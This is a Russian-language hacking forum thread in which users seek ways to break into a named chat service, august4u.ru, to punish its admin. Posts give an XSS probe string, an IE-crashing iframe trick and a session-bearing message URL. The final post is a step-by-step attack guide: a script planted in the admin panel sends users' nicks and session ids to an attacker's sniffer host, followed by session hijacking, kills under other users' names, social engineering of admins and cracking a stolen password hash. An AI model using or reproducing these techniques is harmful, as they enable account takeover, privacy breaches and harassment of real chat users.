|
Что это за чат и как его сломать?
Народ, создаю эту темку так сказать с надеждой на вас. Кто знает что это за чат - http://www.bestchat.august4u.ru
Какие есть баги и т.д. Одна падлюга, точнее админ этого чата, любит пофлудить на других сайтах. Нужно его проучить ;0) |
гы сичас посмотрим !
|
Чат надёжный, баг почти нет. нужно сниффер туда залить а дальше если что объясню.
|
А скрипт чата где-нить взять можно?????
|
Нет скорее всего....Самописный.
|
ддосите сайт нах чтоли??=) не открывается...
|
Я админа предупреждал о ДДоське =)
|
Ребят....дык там пхпББ стоит =))))
|
....Рядом с чатом....тока на другом серванте....всё равно пох, ща найду на харде сплоит и будет всё гуд :-)
|
потом отпиши чё да как там=)
|
бугага. это августовский чат. все они стоят на одном сенрваке и исходника нет как такового. просто башляш хостеру 10 баков в месяц, а он дает тебе готовый чат с доступом к админке и все.
ломачи. бугага |
это уже давно известно, вникни в суть мессаг.
|
people/?id=0&result=info&nick="<h1>forever
проктически нет дыр и если вы найдете то влюбом случае не отписывайте их тут лучше пусть знаю тока в закрытой теме те кому надо!!! |
напиши мне в ПМ о дырах.
|
зная id или сессию можно много чего сделать, но вот проблема состит в том, чтобы их узнать.
|
видел одного человека на это форуме который точно знает как взломать
смотрите другие взломы августинских чатов на форуме вроде три раза уже содавали тему о прозьбе взлома августинского чата |
а что за ник?
|
непомню это было 2 месяца назад
|
Можно-ли как-нибудь хоть безопасно зафлудить в этих чатах? Допустим, для поднятия рейтинга, получения звания... Набить фраз...
|
И расскажите плиз подробно о том, как можно использовать Id и сессию. Допустим, я узнал сессию (хотя бы спросив её... есть такие лолы, которые скажут...) и что делать дальше? Пихал в куки, прописывал сессию в адресной строке - ни хрена :) Спасибо, что объясните новису... :))
|
если ты килл 3 степени ты можешь им пользоваться как и супер килл!!! вот это там можно;) удалять на скока хочешь не на 2 недели а на 100 лет
|
форев, расскажи поподробнее, чё нарыл, признавайся=)
|
давай ты мне стукнишь в асю 239920171 а то к тебе не пробится!!!!
|
Цитата:
ещё прикольный способ есть как выкинуть чела из чата. 1) нужно пропатчить IE 2) в личку кинуть месагу с тегом <iframe src="url"></iframe> где url - url на страничку с уязвимостью в IE типа <img src="pic.png" width="9999999" height="9999999" alt="puh" /> (http://nr.jino-net.ru/photo.htm) перезагруз компа обеспечен! а в логах килла ничего нет! или на страничку killwin.html, только защиту от всплывающих окон включить надо.. |
а, вот это я помню, ты мне об этом говорил=)
|
Дак а как так всё таки можно набрать много сообщений ...
|
да флудом только, больше никак, я тебе уже об этом говорил. вот тут ты флудишь своим вопросом, на который сотни раз получал ответ.
Танзвут тебе предложил вариант, смени прокси, зайди другим браузером, тоесть двумя и разговаривай сам с собой. |
Цитата:
что я там обноруживал так это через какую троку отпровляется сообщения!!! |
А зачем с самим собой, когда можно с другими? =))
|
ну может чел там в качестве "Изгоя" или недостаточно уровня итиллекта чтобы с кем то пообщаться, вот пусть уж использует такой вариант=)
|
гыгы.........:)_)
А теги html кто нибуть знает... |
Цитата:
|
ну ты блин даёшь.
заид по ссылке http://domen.august4u.ru/help?tags и правой кнопкий мыши во всплывающем окне нажми просмотр HTML кода. и юзай оттуда подставляя свои значения. так глядишь и выучишь. а ещё лучше в гугле или любом поисковике пропиши, "Скачать учебник по руководству html" и учи=) |
вот строка для отправки сообщений
http://{chat}.ru:8080/a=22&c={chat}&id=7fc02c0f71af5f6a&nick=Maloy&mess= Maloy%2C+%E3%F8&imess= может вы ченить придумаети как взломать это мало что дас ну ктото можетже даже и через эту строку ломать!!! |
http://{chat}.august4u.ru:8080/a=22&c={chat}&id=7fc02c0f71af5f6a&nick=Maloy&mess= Maloy%2C+%E3%F8&imess=
|
выложу всё что у меня есть!
1)И так, чтение личных сообщений, записной книжки, килл от чужого имени, добавление привелегий и прочее:
1.1) нужен доступ в админку с открытым "Список юзеров" 1.2) далее в "Надписях" в строчке "Кто в чате" прописываеш снифер: "<script>img/**/=/**/new/**/Image();/**/img.src/**/=/**/"http://[урл на сниф]?"+parent.Nick;+Nav.src;</script>Кто в чате" .... 1.2.1) можно сначала вместо надписи "Кто в чате" поставить картинку типа такой <img src="http://твой сайт/кто в чате.gif"> и админу сказать что картинку поставил и надпись прикольнее выглядит... 1.2.2)затем ес адин одобрит, то после картинки прописываем скрипт снифа и палева не будет! 1.3) далее в логе будет написан ник юзера и его сесия с id далее через IE_XSS_Kit подставляем id http://august4u.ru/send.php?sess=f3...e9c2b058ac2df7e&id=[id юзера] 1.4) килл от чужого имени: достаточно страничку килла сохранить на компе и заменить id, также надпсь TimeKill [20160] = "на две недели" можно заменить на TimeKill [40320] = "на 8==Э знает какое время=)" и TimeMute [10] = "на десять минут" на TimeMute [60] = "на 60 минут" 2) у вас может возникнуть вопрос примеру: "можно ли ещё куданито его спрятать?" - можно! есть даже те места где id лежит в чистом виде. Допустим где "настройки профиля" (граф-ник, цвет текста ника и собщений), смотрим св-ва странички и видим!! теперь остаётся спрятать в эту страничку сниф! смотрим вверх странички и видим надпись "настройки" (в каждом чате поразному написано), теперь досаточно зайти в админку и урл на картинку поставить.. лучше всего если использовать свой сниффер потомучто пустую картинку можно заменить на свою и лапоухий главный админ опять ничего непросечёт=) Теперь идём в "просмотор разговора" - строка браузера - это просто достаточно в чат запустить картинку снифа и ждать что ктото начнёт просматривать разговор, но это муторно постоянно следить за логом, да и разговор не часто просматривают... ещё помоему место есть, это после входа в чат, слева есть надпись "привет, Nick" помоему вот сюда можно, но я не пробовал и уверен что есть ещё много мест... 3) Угон чата!!!: и так, мы нашли только что открывшийся чат! соответственно нет хорошего дизайна, своего форума да и сайта.. 3.1) первая задача это скорешица с админом, к примеру с умением рисовать, показать ему парочку абалденных графических ников, дать пару ссылочек на картинки с задумкой дизайна и т.п. показать ему парочку КрАсИвЫх фраз для тегов.. вот после этого возможно админ и откроет админку! 3.2) делаем форум, сайт под управлением CMS. CMS - на мой взгляд более лучший вариант, разместив парочку прикольных прог, анегдотов, статей и прочего.. тем самым можно побыстрее набрать пользователей... мною был выбран хостинг jino-net.ru потомучто нет рекламы, удобная контрольная админ панель, есть аренда приложений - тем самым меньше гемора с установкой, 70 метров свободного места и 20 метров под БД... 3.3) после регистрации админа заходим в БД и вытаскиваем его хеш.. далее муторная расшифровка пароля... в моём случае пароль был простой "220788" (видимо день рождения) и подошёл на мыло, админ неиспользавал Outlook Express, The BAT, не удалил письма от support@august4u.ru который настоятельно просит сохранить данное письмо и использовать данный пароль... З.Ы. хотелось бы оставить пару советов администраторам чатов, но думаю прочитав что написано выше - учтут ошибки, и пользуясь случаем и зная что сюда заглядывает администратор,(в простонародии "август" и "ёб***й август" - второе обычно выплывает при глюках чата:)), хотел бы оставить ему парочку строчек: будь челом, сделай возможность загрузки картинок вместо надписей и каждую под свой дизайн, на выбор - оставить надпись или использовать картинку; вызов собеседника (знаю, это геморно, опять глюки в чатах, но всёже - за шо те бабки платят?:confused: ) |
молодец, хорошо написал всё, расписал. только теперь я думаю август рассылку сделает, типа будьте бдительнее, не давайте свои админки и т.д. да и админов терь не нае*шь=)
|
З.З.Ы. забыл написать по поводу бота... без него както неинтересно=)
|
Цитата:
|
да в принципе что именно там можно залатать, всё зависит от админов. хотя посмотрим, что он придумает, может и замутит что нибудь.
|
| Время: 13:02 |